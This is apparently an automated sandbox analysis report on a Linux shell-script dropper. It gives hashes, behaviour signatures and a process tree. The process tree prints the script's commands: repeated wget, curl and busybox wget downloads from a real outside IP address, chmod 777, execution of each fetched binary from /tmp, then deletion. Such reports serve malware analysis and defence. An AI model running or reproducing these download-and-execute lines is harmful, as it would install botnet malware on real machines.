Analysis
-
max time kernel
19s -
max time network
21s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24/11/2024, 01:01
Static task
static1
Behavioral task
behavioral1
Sample
79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh
-
Size
10KB
-
MD5
112415f7f803f0bc4c888b82f2c037a3
-
SHA1
7b1124181c17eebde60fab13d9a272f93f4e2943
-
SHA256
79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd
-
SHA512
293e8e27189dd5875d8d5e14dfa1d1a13f03240d95b9fc142f94f0576efb4b6ce8d2be8b05b334a96280ad14f2c295f64c284e25f4f9fe2e1f15f1ce8a4e0e49
-
SSDEEP
192:mig3ol2lqlXwgCSec72qbuCtCVCldOY476GG7Fthy+fv7zeS8aMUF7G6S7q2dV9u:Ec5IQlcY4WqC+sIQlcYpb
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 829 chmod 745 chmod 791 chmod 797 chmod 803 chmod 809 chmod 815 chmod 821 chmod 835 chmod 755 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy 746 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 757 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat 792 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c 798 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E 804 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y 810 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT 816 Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 822 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB 830 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR 836 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c curl File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y curl File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy curl File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 curl File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat curl File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB curl File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR curl File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E curl File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT curl File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 curl
Processes
-
/tmp/79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh/tmp/79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh1⤵PID:671
-
/bin/rm/bin/rm bins.sh2⤵PID:673
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:676
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:719
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:741
-
-
/bin/chmodchmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:754
-
-
/bin/chmodchmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:788
-
-
/bin/chmodchmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:793
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:796
-
-
/bin/chmodchmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:800
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:802
-
-
/bin/chmodchmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:805
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:806
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:808
-
-
/bin/chmodchmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:814
-
-
/bin/chmodchmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT./Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:820
-
-
/bin/chmodchmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:826
-
-
/bin/chmodchmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:834
-
-
/bin/chmodchmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:838
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97